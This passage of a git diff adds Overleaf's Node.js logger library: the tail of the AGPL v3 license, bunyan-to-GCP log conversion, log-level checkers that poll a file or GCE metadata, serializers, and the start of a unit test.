prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. 
+ + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. 
+ + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. 
+ + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. 
If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). 
To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. 
+ + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. 
+ + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + <one line to give the program's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see <https://www.gnu.org/licenses/>. + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +<https://www.gnu.org/licenses/>.
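As a worked illustration of the notice described above, a new JavaScript source file in a project under this license might begin with a header along these lines (a sketch only: the description line, year, and author remain placeholders, not values taken from this commit):

```
// <one line to give the program's name and a brief idea of what it does.>
// Copyright (C) <year> <name of author>
//
// This program is free software: you can redistribute it and/or modify
// it under the terms of the GNU Affero General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU Affero General Public License for more details.
//
// You should have received a copy of the GNU Affero General Public License
// along with this program. If not, see <https://www.gnu.org/licenses/>.
```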
diff --git a/libraries/logger/buildscript.txt b/libraries/logger/buildscript.txt new file mode 100644 index 0000000..afe93c2 --- /dev/null +++ b/libraries/logger/buildscript.txt @@ -0,0 +1,10 @@ +logger +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/logger/gcp-manager.js b/libraries/logger/gcp-manager.js new file mode 100644 index 0000000..99fe6d4 --- /dev/null +++ b/libraries/logger/gcp-manager.js @@ -0,0 +1,133 @@ +const bunyan = require('bunyan') + +/** + * When we copy log entry fields, omit some bunyan core fields that are not + * interesting, that have a special meaning in GCP, or that we will process + * separately. + */ +const ENTRY_FIELDS_TO_OMIT = [ + 'level', + 'name', + 'hostname', + 'v', + 'pid', + 'msg', + 'err', + 'error', + 'req', + 'res', +] + +/** + * Convert a bunyan log entry to a format that GCP understands + */ +function convertLogEntry(entry) { + const gcpEntry = omit(entry, ENTRY_FIELDS_TO_OMIT) + + // Error information. In GCP, the stack trace goes in the message property. + // This enables the error reporting feature. + const err = entry.err || entry.error + if (err) { + if (err.info) { + Object.assign(gcpEntry, err.info) + } + if (err.code) { + gcpEntry.code = err.code + } + if (err.signal) { + gcpEntry.signal = err.signal + } + const stack = err.stack + if (stack && stack !== '(no stack)') { + gcpEntry.message = stack + } else if (err.message) { + gcpEntry.message = err.message + } + if (entry.name) { + gcpEntry.serviceContext = { service: entry.name } + } + } + + // Log message + if (entry.msg) { + if (gcpEntry.message) { + // A message has already been extracted from the error. Keep the extra + // message in the msg property. + gcpEntry.msg = entry.msg + } else { + gcpEntry.message = entry.msg + } + } + + // Severity + if (entry.level) { + gcpEntry.severity = bunyan.nameFromLevel[entry.level] + } + + // HTTP request information + if (entry.req || entry.res || entry.responseTimeMs) { + const httpRequest = {} + if (entry.req) { + const req = entry.req + httpRequest.requestMethod = req.method + httpRequest.requestUrl = req.url + httpRequest.remoteIp = req.remoteAddress + if (req.headers) { + if (req.headers['content-length']) { + httpRequest.requestSize = parseInt(req.headers['content-length'], 10) + } + httpRequest.userAgent = req.headers['user-agent'] + httpRequest.referer = req.headers.referer + } + } + + if (entry.res) { + const res = entry.res + httpRequest.status = res.statusCode + if (res.headers && res.headers['content-length']) { + if (res.headers['content-length']) { + httpRequest.responseSize = parseInt(res.headers['content-length'], 10) + } + } + } + + if (entry.responseTimeMs) { + const responseTimeSec = entry.responseTimeMs / 1000 + httpRequest.latency = `${responseTimeSec}s` + } + gcpEntry.httpRequest = httpRequest + } + + // Labels are indexed in GCP. 
We copy the project, doc and user ids to labels to enable fast filtering + const projectId = + gcpEntry.projectId || + gcpEntry.project_id || + (entry.req && entry.req.projectId) + const userId = + gcpEntry.userId || gcpEntry.user_id || (entry.req && entry.req.userId) + const docId = + gcpEntry.docId || gcpEntry.doc_id || (entry.req && entry.req.docId) + if (projectId || userId || docId) { + const labels = {} + if (projectId) { + labels.projectId = projectId + } + if (userId) { + labels.userId = userId + } + if (docId) { + labels.docId = docId + } + gcpEntry['logging.googleapis.com/labels'] = labels + } + + return gcpEntry +} + +function omit(obj, excludedFields) { + return Object.fromEntries( + Object.entries(obj).filter(([key]) => !excludedFields.includes(key)) + ) +} + +module.exports = { convertLogEntry } diff --git a/libraries/logger/index.js b/libraries/logger/index.js new file mode 100755 index 0000000..6cd6f9e --- /dev/null +++ b/libraries/logger/index.js @@ -0,0 +1 @@ +module.exports = require('./logging-manager.js') diff --git a/libraries/logger/log-level-checker.js b/libraries/logger/log-level-checker.js new file mode 100644 index 0000000..fd2f984 --- /dev/null +++ b/libraries/logger/log-level-checker.js @@ -0,0 +1,60 @@ +const { fetchString } = require('@overleaf/fetch-utils') +const fs = require('node:fs') + +class LogLevelChecker { + constructor(logger, defaultLevel) { + this.logger = logger + this.defaultLevel = defaultLevel + } + + start() { + // check for log level override on startup + this.checkLogLevel() + // re-check log level every minute + this.checkInterval = setInterval(this.checkLogLevel.bind(this), 1000 * 60) + this.checkInterval.unref() + } + + stop() { + clearInterval(this.checkInterval) + } + + async checkLogLevel() { + try { + const end = await this.getTracingEndTime() + if (end > Date.now()) { + this.logger.level('trace') + } else { + this.logger.level(this.defaultLevel) + } + } catch (e) { + this.logger.level(this.defaultLevel) + } + } + + async getTracingEndTime() { + return 0 + } +} + +class FileLogLevelChecker extends LogLevelChecker { + async getTracingEndTime() { + const strEndTime = await fs.promises.readFile('/logging/tracingEndTime') + return parseInt(strEndTime, 10) + } +} + +class GCEMetadataLogLevelChecker extends LogLevelChecker { + async getTracingEndTime() { + const options = { + headers: { + 'Metadata-Flavor': 'Google', + }, + } + const uri = `http://metadata.google.internal/computeMetadata/v1/project/attributes/${this.logger.fields.name}-setLogLevelEndTime` + const strEndTime = await fetchString(uri, options) + return parseInt(strEndTime, 10) + } +} + +module.exports = { FileLogLevelChecker, GCEMetadataLogLevelChecker } diff --git a/libraries/logger/logging-manager.js b/libraries/logger/logging-manager.js new file mode 100644 index 0000000..edf922b --- /dev/null +++ b/libraries/logger/logging-manager.js @@ -0,0 +1,186 @@ +const Stream = require('node:stream') +const bunyan = require('bunyan') +const GCPManager = require('./gcp-manager') +const Serializers = require('./serializers') +const { + FileLogLevelChecker, + GCEMetadataLogLevelChecker, +} = require('./log-level-checker') + +const LoggingManager = { + /** + * @param {string} name - The name of the logger + */ + initialize(name) { + this.isProduction = + (process.env.NODE_ENV || '').toLowerCase() === 'production' + const isTest = (process.env.NODE_ENV || '').toLowerCase() === 'test' + this.defaultLevel = + process.env.LOG_LEVEL || + (this.isProduction ? 'info' : isTest ? 
'fatal' : 'debug') + this.loggerName = name + this.logger = bunyan.createLogger({ + name, + serializers: { + err: Serializers.err, + error: Serializers.err, + req: Serializers.req, + res: Serializers.res, + }, + streams: [this._getOutputStreamConfig()], + }) + this._setupRingBuffer() + this._setupLogLevelChecker() + return this + }, + + /** + * @param {Record|string} attributes - Attributes to log (nice serialization for err, req, res) + * @param {string} [message] - Optional message + * @signature `debug(attributes, message)` + * @signature `debug(message)` + */ + debug(attributes, message, ...args) { + return this.logger.debug(attributes, message, ...args) + }, + + /** + * @param {Record|string} attributes - Attributes to log (nice serialization for err, req, res) + * @param {string} [message] + * @signature `info(attributes, message)` + * @signature `info(message)` + */ + info(attributes, message, ...args) { + return this.logger.info(attributes, message, ...args) + }, + + /** + * @param {Record} attributes - Attributes to log (nice serialization for err, req, res) + * @param {string} [message] + */ + error(attributes, message, ...args) { + if (this.ringBuffer !== null && Array.isArray(this.ringBuffer.records)) { + attributes.logBuffer = this.ringBuffer.records.filter(function (record) { + return record.level !== 50 + }) + } + this.logger.error(attributes, message, ...Array.from(args)) + }, + + /** + * Alias to the error method. + * @param {Record} attributes - Attributes to log (nice serialization for err, req, res) + * @param {string} [message] + */ + err(attributes, message, ...args) { + return this.error(attributes, message, ...args) + }, + + /** + * @param {Record|string} attributes - Attributes to log (nice serialization for err, req, res) + * @param {string} [message] + * @signature `warn(attributes, message)` + * @signature `warn(message)` + */ + warn(attributes, message, ...args) { + return this.logger.warn(attributes, message, ...args) + }, + + /** + * @param {Record} attributes - Attributes to log (nice serialization for err, req, res) + * @param {string} [message] + */ + fatal(attributes, message) { + this.logger.fatal(attributes, message) + }, + + _getOutputStreamConfig() { + switch (process.env.LOGGING_FORMAT) { + case 'gke': { + const stream = new Stream.Writable({ + objectMode: true, + write(entry, encoding, callback) { + const gcpEntry = GCPManager.convertLogEntry(entry) + // eslint-disable-next-line no-console + console.log(JSON.stringify(gcpEntry, bunyan.safeCycles())) + setImmediate(callback) + }, + }) + return { level: this.defaultLevel, type: 'raw', stream } + } + case 'gce': { + const { LoggingBunyan } = require('@google-cloud/logging-bunyan') + return new LoggingBunyan({ + logName: this.loggerName, + serviceContext: { service: this.loggerName }, + }).stream(this.defaultLevel) + } + default: { + return { level: this.defaultLevel, stream: process.stdout } + } + } + }, + + _setupRingBuffer() { + this.ringBufferSize = parseInt(process.env.LOG_RING_BUFFER_SIZE) || 0 + if (this.ringBufferSize > 0) { + this.ringBuffer = new bunyan.RingBuffer({ limit: this.ringBufferSize }) + this.logger.addStream({ + level: 'trace', + type: 'raw', + stream: this.ringBuffer, + }) + } else { + this.ringBuffer = null + } + }, + + _setupLogLevelChecker() { + const logLevelSource = ( + process.env.LOG_LEVEL_SOURCE || 'file' + ).toLowerCase() + + if (this.logLevelChecker) { + this.logLevelChecker.stop() + this.logLevelChecker = null + } + + if (this.isProduction) { + switch (logLevelSource) { 
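+        // Annotation: the checker chosen here polls an external source once a
+        // minute and raises the level to 'trace' until the advertised end time
+        // passes, then restores the default (see log-level-checker.js above).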
+ case 'file': + this.logLevelChecker = new FileLogLevelChecker( + this.logger, + this.defaultLevel + ) + break + case 'gce_metadata': + this.logLevelChecker = new GCEMetadataLogLevelChecker( + this.logger, + this.defaultLevel + ) + break + case 'none': + break + default: + // eslint-disable-next-line no-console + console.log(`Unrecognised log level source: ${logLevelSource}`) + } + if (this.logLevelChecker) { + this.logLevelChecker.start() + } + } + }, +} + +LoggingManager.initialize('default') + +function handleWarning(err) { + LoggingManager.warn({ err }, 'Warning details') +} + +process.on('warning', handleWarning) +LoggingManager.removeWarningHandler = () => { + process.off('warning', handleWarning) +} + +module.exports = LoggingManager diff --git a/libraries/logger/package.json b/libraries/logger/package.json new file mode 100644 index 0000000..0e7fd2d --- /dev/null +++ b/libraries/logger/package.json @@ -0,0 +1,39 @@ +{ + "name": "@overleaf/logger", + "homepage": "www.overleaf.com", + "description": "A centralised logging system for Overleaf", + "repository": { + "type": "git", + "url": "https://github.com/overleaf/overleaf" + }, + "main": "index.js", + "license": "AGPL-3.0-only", + "version": "3.1.1", + "scripts": { + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "test:ci": "npm run test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "types:check": "tsc --noEmit" + }, + "dependencies": { + "@google-cloud/logging-bunyan": "^5.1.0", + "@overleaf/fetch-utils": "*", + "@overleaf/o-error": "*", + "bunyan": "^1.8.14" + }, + "devDependencies": { + "chai": "^4.3.6", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + }, + "peerDependencies": { + "@overleaf/metrics": "*" + } +} diff --git a/libraries/logger/serializers.js b/libraries/logger/serializers.js new file mode 100644 index 0000000..d6831a0 --- /dev/null +++ b/libraries/logger/serializers.js @@ -0,0 +1,83 @@ +const OError = require('@overleaf/o-error') + +function errSerializer(err) { + if (!err) { + return err + } + let message = err.message + if (err.path) { + // filter paths from the message to avoid duplicate errors with different path in message + // (e.g. 
errors from `fs` methods which have a path attribute) + message = message.replace(` '${err.path}'`, '') + } + return { + message, + name: err.name, + stack: OError.getFullStack(err), + info: OError.getFullInfo(err), + code: err.code, + signal: err.signal, + path: err.path, + } +} + +function reqSerializer(req) { + if (!req) { + return req + } + const headers = req.headers || {} + const entry = { + method: req.method, + url: req.originalUrl || req.url, + remoteAddress: getRemoteIp(req), + headers: { + referer: headers.referer || headers.referrer, + 'user-agent': headers['user-agent'], + 'content-length': headers['content-length'], + }, + } + if (req.params) { + const projectId = + req.params.projectId || req.params.project_id || req.params.Project_id + const userId = req.params.userId || req.params.user_id + const docId = req.params.docId || req.params.doc_id + if (projectId) { + entry.projectId = projectId + } + if (userId) { + entry.userId = userId + } + if (docId) { + entry.docId = docId + } + } + return entry +} + +function resSerializer(res) { + if (!res) { + return res + } + return { + statusCode: res.statusCode, + headers: { + 'content-length': res.getHeader && res.getHeader('content-length'), + }, + } +} + +function getRemoteIp(req) { + if (req.ip) { + return req.ip + } + if (req.socket) { + if (req.socket.socket && req.socket.socket.remoteAddress) { + return req.socket.socket.remoteAddress + } else if (req.socket.remoteAddress) { + return req.socket.remoteAddress + } + } + return null +} + +module.exports = { err: errSerializer, req: reqSerializer, res: resSerializer } diff --git a/libraries/logger/test/setup.js b/libraries/logger/test/setup.js new file mode 100644 index 0000000..eb16fac --- /dev/null +++ b/libraries/logger/test/setup.js @@ -0,0 +1,16 @@ +const chai = require('chai') +const sinonChai = require('sinon-chai') +const SandboxedModule = require('sandboxed-module') + +// Chai configuration +chai.should() +chai.use(sinonChai) + +SandboxedModule.configure({ + globals: { Buffer, JSON, console, process }, + sourceTransformers: { + removeNodePrefix: function (source) { + return source.replace(/require\(['"]node:/g, "require('") + }, + }, +}) diff --git a/libraries/logger/test/unit/log-level-checker-tests.js b/libraries/logger/test/unit/log-level-checker-tests.js new file mode 100644 index 0000000..64ae6d9 --- /dev/null +++ b/libraries/logger/test/unit/log-level-checker-tests.js @@ -0,0 +1,186 @@ +const Path = require('node:path') +const { promisify } = require('node:util') +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { expect } = require('chai') + +const MODULE_PATH = Path.join(__dirname, '../../log-level-checker.js') +const DEFAULT_LEVEL = 'warn' +const TRACE_LEVEL = 'trace' +const TRACING_END_TIME_FILE = '/logging/tracingEndTime' +const NOW = 10000 +const PAST = NOW - 1000 +const FUTURE = NOW + 1000 + +const delay = promisify(setTimeout) + +describe('LogLevelChecker', function () { + beforeEach(function () { + this.logger = { + level: sinon.stub(), + fields: { name: 'myapp' }, + } + this.FetchUtils = { + fetchString: sinon.stub(), + } + this.fetchLogLevelEndTimeStub = this.FetchUtils.fetchString.withArgs( + 'http://metadata.google.internal/computeMetadata/v1/project/attributes/myapp-setLogLevelEndTime', + { headers: { 'Metadata-Flavor': 'Google' } } + ) + this.fetchLogLevelEndTimeStub.resolves('') + + this.fs = { + promises: { + readFile: sinon.stub(), + }, + } + + this.clock = sinon.useFakeTimers(NOW) + + this.module = 